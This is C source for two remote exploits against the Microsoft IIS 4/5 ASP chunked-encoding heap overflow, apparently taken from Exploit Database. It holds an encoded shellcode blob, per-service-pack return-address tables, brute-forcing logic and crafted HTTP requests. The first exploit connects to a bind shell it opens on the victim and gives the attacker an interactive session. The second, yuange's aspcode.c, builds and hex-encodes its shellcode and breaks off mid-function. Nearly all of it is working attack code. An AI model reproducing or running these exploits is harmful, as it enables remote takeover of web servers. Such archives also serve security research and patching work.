"\x5d\x55\x55\xcc\xaf\xaa\xab\xcc\x23\x30\x6f\x90\x5d\x55\x55\x21"
"\x27\x90\x5d\x55\x55\x30\x6b\x4b\x55\x55\xaa\xaa\x30\x6b\x53\xaa"
"\xab\xaa\xaa\xd7\xb8\xcc\x21\x30\x7f\x90\x5d\x55\x55\xcc\x29\x68"
"\xab\xcc\x23\x30\x7f\x90\x5d\x55\x55\x41\x32\x21\x5e\xc0\xa0\x21"
"\x30\x6f\xe6\x5d\x55\x55\xfa\x55\x30\x7f\x76\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x13\xab\xaa\xaa\xaa\x30\x6f\x63\xa5\x30\x6e"
"\x6c\xa8\xaa\xaa\x21\x5e\x27\x30\x7f\x9e\x5d\x55\x55\xf8\x27\x30"
"\x6f\x92\x5d\x55\x55\xfa\x21\x27\xe6\x5d\x55\x55\xfb\x55\x30\x7f"
"\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\xe2\x5d"
"\x55\x55\x6d\x30\x6f\xaa\x5d\x55\x55\xa6\xaa\xaa\xaa\x6d\x30\x6f"
"\xae\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\xa2\x5d\x55\x55\xab"
"\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27"
"\x30\x6f\xbe\x5d\x55\x55\xfa\x27\x27\xb2\x5d\x55\x55\xfb\x55\x30"
"\x7f\x12\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x5e\xc0\xaa"
"\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27\x30\x6f\xa6\x5d\x55\x55\xfa"
"\x27\x27\xba\x5d\x55\x55\xfb\x55\x30\x7f\x12\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x27\x17\xfa\x5d\x55\x55\x99\x6a\x13\xbb\xaa"
"\xaa\xaa\x58\x30\x41\x6d\x30\x6f\xd6\x5d\x55\x55\xab\xab\xaa\xaa"
"\xcc\x6d\x30\x6f\x2a\x5d\x55\x55\xaa\xaa\x21\x30\x7f\xba\x5d\x55"
"\x55\x23\x30\x7f\x22\x5d\x55\x55\x21\x30\x6f\xbe\x5d\x55\x55\x23"
"\x30\x6f\x26\x5d\x55\x55\x21\x27\xbe\x5d\x55\x55\x23\x27\x3a\x5d"
"\x55\x55\x21\x5e\x27\x30\x7f\xb6\x5d\x55\x55\xf8\x27\x30\x6f\xfa"
"\x5d\x55\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa"
"\x21\x27\x30\x42\x5d\x55\x55\xfb\xc0\xaa\x55\x30\x7f\x16\x5d\x55"
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\x21"
"\x5e\xc0\xaa\xc0\xaa\x27\x30\x7f\x9a\x5d\x55\x55\xf8\xc2\xaa\xae"
"\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xb2\x5d\x55\x55"
"\xfb\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x30"
"\x50\xab\xaa\xaa\xaa\x30\x6f\x78\xa5\x30\x6e\xdf\xab\xaa\xaa\x21"
"\x5e\xc0\xaa\xc0\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\xc2\xaa\xae"
"\xaa\xaa\x27\x27\xaa\x52\x55\x55\xfb\x21\x30\x7f\xb2\x5d\x55\x55"
"\xf8\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
"\x17\x9a\x5d\x55\x55\xaa\xa5\x24\x30\x6e\xaa\xaa\xaa\x21\x5e\xc0"
"\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\x21\x27\x9a\x5d\x55\x55\xfb"
"\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xb2\x5d\x55\x55\xfa"
"\x55\x30\x7f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29\x17"
"\x9a\x5d\x55\x55\xaa\xd4\x82\x21\x5e\xc0\xaa\x21\x27\x9a\x5d\x55"
"\x55\xfb\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xe2\x5d\x55"
"\x55\xfa\x55\x30\x7f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1"
"\x41\x8b\x21\x5e\xc0\xaa\xc0\xa2\x21\x27\x30\x42\x5d\x55\x55\xfb"
"\x21\x30\x7f\xe2\x5d\x55\x55\xf8\x55\x30\x7f\x4e\x5d\x55\x55\x91"
"\x5e\x3a\xe9\xe1\xe9\xe1\x43\x18\xaa\xaa\xaa\x21\x5e\xc0\xaa\xc2"
"\xaa\xae\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xe2\x5d"
"\x55\x55\xfb\x55\x30\x7f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x23\x30\x6f\x9a\x5d\x55\x55\x29\x17\x9a\x5d\x55\x55\xaa\xd5"
"\xf8\x6d\x30\x6f\x9a\x5d\x55\x55\xac\xaa\xaa\xaa\x21\x5e\xc0\xaa"
"\x27\x30\x7f\x9a\x5d\x55\x55\xf8\x21\x30\x6f\x9a\x5d\x55\x55\xfa"
"\x21\x27\x30\x42\x5d\x55\x55\x29\x6b\xa2\xfb\x21\x30\x7f\xa6\x5d"
"\x55\x55\xf8\x55\x30\x7f\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x21\x5e\x21\x30\x6f\xe2\x5d\x55\x55\xfa\x55\x30\x7f\x5a\x5d"
"\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x41\x98\x21\x5e\xc0\xaa\x27"
"\x27\x9a\x5d\x55\x55\xfb\x21\x30\x7f\x9a\x5d\x55\x55\xf8\x27\x30"
"\x6f\xaa\x52\x55\x55\xfa\x21\x27\xa6\x5d\x55\x55\xfb\x55\x30\x7f"
"\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\xd4\x54\x55\x55"
"\x43\x87\x57\x55\x55\x41\x54\xf2\xfa\x21\x17\x30\x42\x5d\x55\x55"
"\x23\xed\x58\x69\x21\xee\x8e\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee"
"\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\xb3\x53\x55\x55\xb4\xc6\xe6"
"\xc5\xcb\xce\xe6\xc3\xc8\xd8\xcb\xd8\xd3\xeb\xaa\xe9\xd8\xcf\xcb"
"\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde\xcf\xfa\xd8\xc5"
"\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce\xc6"
"\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa"
"\xf8\xcf\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3"
"\xc6\xcf\xaa\xdd\xd9\xc5\xc9\xc1\x99\x98\x84\xce\xc6\xc6\xaa\xd9"
"\xc5\xc9\xc1\xcf\xde\xaa\xc8\xc3\xc4\xce\xaa\xc6\xc3\xd9\xde\xcf"
"\xc4\xaa\xcb\xc9\xc9\xcf\xda\xde\xaa\xd9\xcf\xc4\xce\xaa\xd8\xcf"
"\xc9\xdc\xaa\xc3\xc5\xc9\xde\xc6\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9"
"\xc6\xc5\xd9\xcf\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9\xc7\xce\x84\xcf"
"\xd2\xcf\xaa\xcf\xd2\xc3\xde\xa7\xa0\xaa";

struct{
    int def;
    char *descr;
    unsigned int ret;
    unsigned int rewrite;
    int port;
    char path[256];
}target[] = {
    {0, " IIS5 Windows 2000 by hsj", 0x0045C560, 0x77eaf44c, 80, "/iisstart.asp"},
    {1, " IIS5 Windows 2000 Chinese SP0 - SP1", 0x0045C560, 0x77ec044c, 80, "/iisstart.asp"},
    {2, " IIS5 Windows 2000 Chinese SP2", 0x0045C560, 0x77ebf44c, 80, "/iisstart.asp"},
    {3, " IIS5 Windows 2000 English SP2", 0x0045C560, 0x77edf44c, 80, "/iisstart.asp"},
    {4, " IIS4 Windows NT4", 0, 0, 80, "/iisstart.asp"},
    {666, NULL, 0, 0, 0, NULL}
};

int sel = 0;

int resolve (char *IP);
int make_connection(char *address,int port);
int open_back(char *host,int port);
void l33thax0r(int sock);
void usage(char *name);

int main(int argc, char **argv)
{
    int i, j, cnt, sock;
    int brute = 0;
    unsigned int step;
    unsigned char *shell_port_offset;
    char buf[8192], buf2[16384], host[1024];
    unsigned int ret_start, ret_stop, ret_step, ret_1;

    fprintf(stderr, "\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit "
                    "- DDK Crew 2k2 - (version "VERSION")\n"
                    " by NeMeS||y and Birdack\n\n");

    if(argc == 1)
        usage(argv[0]);

    while((cnt = getopt(argc,argv,"h:t:p:f:b:")) != EOF)
    {
        switch(cnt)
        {
            case 'h':
                strncpy(host, optarg, sizeof(host));
                host[sizeof(host) - 1] = '\x00';
                break;
            case 't':
                sel = atoi(optarg);
                break;
            case 'p':
                sscanf(optarg, "%p", &target[sel].port);
                break;
            case 'f':
                strncpy(target[sel].path, optarg, sizeof(&target[sel].path));
                target[sel].path[sizeof(&target[sel].path) -1] = '\x00';
                break;
            case 'b':
                brute = 1;
                step = atoi(optarg);
                break;
            default:
                usage(argv[0]);
                break;
        }
    }

    if(target[sel].def == 4)
        brute = 1; // ;>

    sock = make_connection(host,target[sel].port);
    if(sock<0)
    {
        printf("Error -> [ %d ] not connected.\n\n",sock);
        return -3;
    }

    if(brute==0)
    {
        ret_start = target[sel].ret;
        ret_step = 1;
        ret_stop = target[sel].ret;
    }
    else
    {
        ret_start = RET_BRUTE_START;
        ret_step = step;
        ret_stop = RET_BRUTE_STOP;
    }

    printf("\n [+] Start\n\n host\t->\t%s\n port\t->\t%d\n path\t->\t%s\n type\t->\t%s\n\n\n",
           host, target[sel].port, target[sel].path, target[sel].descr);

    if(brute==1)
        printf("\n [+] Brute forcing enabled... do u have time?\n\n");

    for(ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step)
    {
        for(i=0;i<sizeof(buf)-strlen(wincode)-12-1;)
        {
            buf[i++] = 0xeb;
            buf[i++] = 0x06;
        }
        *(unsigned int *)&buf[i] = 0x41414141;
        *(unsigned int *)&buf[i+4] = 0x41414141;
        *(unsigned int *)&buf[i+8] = 0x41414141;
        memcpy(&buf[sizeof(buf)-strlen(wincode)-1],wincode,strlen(wincode));
        buf[sizeof(buf)-1] = 0;

        sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Transfer-Encoding: chunked\r\n\r\n"
                     "10\r\nDDKDDKDDKDDKDD\r\n"
                     "4\r\nRETT\r\n"
                     "4\r\nREWR\r\n"
                     "0\r\n\r\n\r\n",
                     &target[sel].path,buf);

        *(unsigned int *)strstr(buf2,"REWR") = &target[sel].rewrite;
        *(unsigned int *)strstr(buf2,"RETT") = ret_1;

        if(brute==0)
            printf(" # Sending buffer to socket : ");
        write(sock,buf2,strlen(buf2));
        fprintf(stderr, " [+] ret : 0x%08lx ->",ret_1);
        sleep(3);
        if(brute==0)
            printf("DONE!\n\n");
        shutdown(sock,2);
        close(sock);

        printf(" # connecting to our shell - port : [ %d ]\n",PORT_BIND);
        sock=open_back(host,PORT_BIND);
        if(sock==-1 && brute==0)
        {
            printf("\n [-] FAILED ");
            printf("exiting now!\n\n");
            exit(-1);
        }
        if(sock!=-1)
        {
            printf("\n\n[+] Address guessed!! \n\n");
            printf("...OH oH OH... done! our evilcode has worked baby at [ %d ]\n", ret_1);
            l33thax0r(sock);
            exit(0);
        }
    }
}

int resolve (char *IP)
{
    struct hostent *info;
    unsigned long ip;

    if ((ip=inet_addr(IP))==-1)
    {
        if ((info=gethostbyname(IP))==0)
        {
            printf("Couldnt resolve [%s]\n", IP);
            exit(0);
        }
        memcpy(&ip, (info->h_addr), 4);
    }
    return (ip);
}

int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if(target.sin_addr.s_addr==0)
    {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -3;
    }
    if(i==0)
    {
        close(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -5;
    }
    ioctl(s,FIONBIO,&bf);
    return s;
}

int open_back(char *host,int port)
{
    int sock, err;
    struct sockaddr_in server_addr;
    struct hostent *he;

    he=gethostbyname(host);
    if (he == NULL)
        return -1;
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons (port);
    server_addr.sin_addr.s_addr = resolve(host);
    sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == -1)
        return -1;
    err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
    if (err == -1)
        sock = -1;
    return sock;
}

void l33thax0r(int sock)
{
    char buf[1024];
    fd_set rset;
    int i;

    while (1)
    {
        FD_ZERO(&rset);
        FD_SET(sock,&rset);
        FD_SET(STDIN_FILENO,&rset);
        select(sock+1,&rset,NULL,NULL,NULL);
        if (FD_ISSET(sock,&rset))
        {
            i=read(sock,buf,1024);
            if (i <= 0)
            {
                printf("Fuck... the connection was closed!\n");
                printf("exiting...\n\n");
                exit(0);
            }
            buf[i]=0;
            puts(buf);
        }
        if (FD_ISSET(STDIN_FILENO,&rset))
        {
            i=read(STDIN_FILENO,buf,1024);
            if (i>0)
            {
                buf[i]=0;
                write(sock,buf,i);
            }
        }
    }
}

void usage(char *name)
{
    int j = 0;

    printf("Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\n", name);
    printf("\nOptions:\n"
           " -h hostname (www.iisvictim.com)\n"
           " -t target\n"
           " -p port (default 80)\n"
           " -f path_file (default /iisstart.asp)\n"
           " -b step (brute force, try step 2000)\n\n"
           "Available targets:\n\n");
    while(target[j].def != 666)
    {
        printf(" %d ] - %s -\n", target[j].def, target[j].descr);
        j++;
    }
    printf("\n");
    exit(1);
}
Exploit Database EDB-ID : 21371

Publication date : 2002-04-23 22h00 +00:00
Author : yuange
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/4485/info

   A heap overflow condition in the 'chunked encoding transfer mechanism' related to
   Active Server Pages has been reported for Microsoft IIS (Internet Information
   Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this
   vulnerability may result in a denial of service or allow for a remote attacker to
   execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is reported to
   ship with a default script (iisstart.asp) which may be sufficient for a remote
   attacker to exploit. Other sample scripts may also be exploitable. A number of
   Cisco products are affected by this vulnerability, although this issue is not
   present in the Cisco products themselves. */

/* aspcode.c ver1.0
   iis4.0, iis5.0, iis5.1 asp.dll overflow program
   copy by yuange <[email protected]> 2002.4.24 */

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma comment(lib,"ws2_32")

//#define RETEIPADDR eipwin2000
#define FNENDLONG 0x08
#define NOPCODE 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
#define RETEIPADDRESS 0x468
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 14
#define DATABASE 0x61
#define DATAXORCODE 0x55
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define MCBSIZE 0x8
#define MEMSIZE 0xb200
#define SHELLPORT 0x1f90 //0x1f90=8080
#define WEBPORT 80

void shellcodefnlock();
void shellcodefnlock2();
void shellcodefn(char *ecb);
void shellcodefn2(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
void iiscmd(int fd,char *str);
void iisreset();
void iisdie();
void iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);

int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;

int main(int argc, char **argv)
{
    char *server;
    char *str="LoadLibraryA""\x0""CreatePipe""\x0"
        "CreateProcessA""\x0""CloseHandle""\x0"
        "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0"
        "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0"
        "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
        "\x09""asp.dll""\x0""HttpExtensionProc""\x0"
        "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
        "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
        "XORDATA""\x0""xordatareset""\x0"
        "strend";
    // char buff0[]="TRACK / HTTP/1.1\nHOST:";
    char buff1[]="GET /";
    char buff2[]="default.asp";
    char *buff2add;
    char buff3[]="?!!ko ";
    char buff4[]=" HTTP/1.1 \nHOST:";
    char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
    char buff51[]="\nTransfer-Encoding:chunked";
    char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1
    char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff
    char buff7[]= "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
    char buff11[]= "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
    char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
    char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
    char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    /*
    char buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
    char buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
    char buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
    char buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
    char buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
    char buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
    */
    char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char SRLF[]="\x0d\x0a\x00\x00";
    char *eipexceptwin2000add;
    char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address
    char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address
    char eipexceptwin2000[]="\x80\x70\x97\x74";
    // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; // call ebx address
    char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
    char eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
    // char eipexceptwin2000[]="\x0B\x08\x5A\x68";
    // char eipexceptwin2000[]="\x32\x8d\x9f\x74";
    char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address
    // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; // call esi address
    // char eipexcept2[]="\xd0\xae\xdc\x77"; //
    char buff[BUFFSIZE];
    char recvbuff[BUFFSIZE];
    char shellcodebuff[BUFFSIZE];
    char shellcodebuff2[BUFFSIZE];
    struct sockaddr_in s_in2,s_in3;
    struct hostent *he;
    char *shellcodefnadd,*chkespadd;
    unsigned int sendpacketlong,buff2long,shelladd,packlong;
    int i,j,k,l,strheadlong;
    unsigned char temp;
    int fd;
    u_short port,port1,shellcodeport;
    SOCKET d_ip;
    WSADATA wsaData;
    int offset=0;
    int OVERADD=RETEIPADDRESS;
    int result;

    fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
    fprintf(stderr,"\n copy by yuange 2002.4.24.");
    fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
    fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
    fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", argv[0]);
    buff2add=buff2;
    if(argc <2){
        fprintf(stderr,"\n please enter the web server:");
        gets(recvbuff);
        for(i=0;i<strlen(recvbuff);++i){
            if(recvbuff[i]!=' ') break;
        }
        server=recvbuff;
        if(i<strlen(recvbuff)) server+=i;
        fprintf(stderr,"\n please enter the .asp filename:");
        gets(shellcodebuff);
        for(i=0;i<strlen(shellcodebuff);++i){
            if(shellcodebuff[i]!=' ') break;
        }
        buff2add=shellcodebuff+i;
        printf("\n .asp file name:%s\n",buff2add);
    }
    eipexceptwin2000add=eipexceptwin2000;
    // printf("\n argc%d argv%s",argc,argv[5]);
    if(argc>5){
        if(strcmp(argv[5],"cn")==0) {
            eipexceptwin2000add=eipexceptwin2000cn;
            printf("\n For the cn system.\n");
        }
        if(strcmp(argv[5],"sp0")==0) {
            eipexceptwin2000add=eipexceptwin20002;
            printf("\n For the sp0 system.\n");
        }
        if(strcmp(argv[5],"msvcrt")==0) {
            eipexceptwin2000add=eipexceptwin2000msvcrt;
            printf("\n Use msvcrt.dll JMP to shell.\n");
        }
        if(strcmp(argv[5],"sp2")==0) {
            eipexceptwin2000add=eipexceptwin2000sp2;
            printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
        }
    }
    result= WSAStartup(MAKEWORD(1, 1), &wsaData);
    if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
            "to the Internet at the time that "
            "this program was launched, or you "
            "do not have a 32-bit "
            "connection to the Internet.");
        exit(1);
    }
    /*
    if(argc>4){
        offset=atoi(argv[4]);
    }
    // OVERADD+=offset;
    // packlong=0x10000-offset+0x8;
    if(offset<-0x20||offset>0x20){
        fprintf(stderr,"\n offset error !offset -32 --- +32 .");
        gets(buff);
        exit(1);
    }
    */
    if(argc <2){
        // WSACleanup( );
        // exit(1);
    }
    else server = argv[1];
    for(i=0;i<strlen(server);++i){
        if(server[i]!=' ') break;
    }
    if(i<strlen(server)) server+=i;
    for(i=0;i+3<strlen(server);++i){
        if(server[i]==':'){
            if(server[i+1]=='\\'||server[i+1]=='/'){
                if(server[i+2]=='\\'||server[i+2]=='/'){
                    server+=i;
                    server+=3;
                    break;
                }
            }
        }
    }
    for(i=1;i<=strlen(server);++i){
        if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
    }
    d_ip = inet_addr(server);
    if(d_ip==-1){
        he = gethostbyname(server);
        if(!he) {
            WSACleanup( );
            printf("\n Can't get the ip of %s !\n",server);
            gets(buff);
            exit(1);
        }
        else memcpy(&d_ip, he->h_addr, 4);
    }
    if(argc>3) port=atoi(argv[3]);
    else port=WEBPORT;
    if(port==0) port=WEBPORT;
    fd = socket(AF_INET, SOCK_STREAM,0);
    i=8000;
    setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(port);
    s_in3.sin_addr.s_addr = d_ip;
    printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
    if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) {
        closesocket(fd);
        WSACleanup( );
        fprintf(stderr,"\n connect err.");
        gets(buff);
        exit(1);
    }
    _asm{
        mov ESI,ESP
        cmp ESI,ESP
    }
    _chkesp();
    chkespadd=_chkesp;
    temp=*chkespadd;
    if(temp==0xe9) {
        ++chkespadd;
        i=*(int*)chkespadd;
        chkespadd+=i;
        chkespadd+=4;
    }
    /*
    shellcodefnadd=shellcodefnlock;
    temp=*shellcodefnadd;
    if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
    }
    for(k=0;k<=0x500;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
    }
    */
    memset(buff,NOPCODE,BUFFSIZE);
    /*
    strcpy(buff,buff0);
    if(argc>6) strcat(buff,argv[6]);
    else strcat(buff,server);
    strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");
    strcat(buff,buff1);
    */
    strcpy(buff,buff1);
    strheadlong=strlen(buff);
    OVERADD+=strheadlong-1;
    if(argc>2) buff2add=argv[2];
    for(;;++buff2add){
        temp=*buff2add;
        if(temp!='\\'&&temp!='/') break;
    }
    // printf("\nfile:%s",buff2add);
    buff2long=strlen(buff2add);
    strcat(buff,buff2add);
    // fprintf(stderr,"\n offset:%d\n",offset);
    // offset+=strheadlong-strlen(buff1);
    /*
    for(i=0x404;i<=0x500;i+=8){
        memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
        memcpy(buff+offset+i+4,eipexceptwin2000add,4);
    }
    if(argc>5){
        if(strcmp(argv[5],"sp2")==0) {
            memcpy(buff+offset+i,"\x58",1);
        }
    }
    for(i=0x220;i<=0x380;i+=8){
        memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
        memcpy(buff+offset+i+4,eipexceptwinnt,4);
    }
    for(i=0x580;i<=0x728;i+=8){
        memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
        memcpy(buff+offset+i+4,eipexceptwinnt,4);
    }
    */
    // winnt 0x2cc or 0x71c win2000 0x130 or 0x468
    // memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
    shellcodefnadd=shellcodefnlock;
    temp=*shellcodefnadd;
    if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
    }
    for(k=0;k<=0x500;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
    }
    memset(shellcodebuff2,NOPCODE,BUFFSIZE);
    i=0x1000;
    memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);
    shellcodefnadd=shellcodefn;
    temp=*shellcodefnadd;
    if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
    }
    for(k=0;k<=BUFFSIZE;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
    }
    // k+=0x
    memcpy(shellcodebuff,shellcodefnadd,k); //j);
    cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
    for(j=0;j<0x400;++j){
        if(memcmp(str+j,"strend",6)==0) break;
    }
    memcpy(shellcodebuff+k,str,j);
    sendpacketlong=k+j;
    for(k=0;k<=0x200;++k){
        if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
    }
    // hex-encode the shellcode with a 0x61 base so it survives the URL/body path;
    // shellcodefnlock decodes it in place on the server
    for(j=0;j<sendpacketlong;++j){
        temp=shellcodebuff[j];
        // temp^=DATAXORCODE;
        shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
        ++k;
        shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
        ++k;
    }
    j=i+k;
    j=j%8+3;
    shellcodebuff2[i+j+k]=0;
    // j=strlen(shellcodebuff2)%8+3;
    for(j=0;j<=0xe000;j+=4){
        strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32
        // strcat(shellcodebuff2,eipexceptwin2000cn);
    }
    /*
    strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\x90");
    for(j=0;j<=0xb00;j+=4){
        strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32
    }
    */
    // printf("\nbuff:%s",buff);
    printf("\n shellcode long 0x%x\n",sendpacketlong);
    if(argc>4&&strcmp(argv[4],"apache")==0){
        strcat(buff," ");
    }
    else strcat(buff,buff3);
    printf("\n packetlong:0x%x\n",sendpacketlong);
    strcat(buff,buff4);
    if(argc>6) strcat(buff,argv[6]);
    else strcat(buff,server);
    strcat(buff,buff5);
    if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
    else strcat(buff,shellcodebuff2);
    // strcat(buff,buff51);
    if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
        printf("\n for %s system\n",argv[4]);
        strcat(buff,buff61);
    }
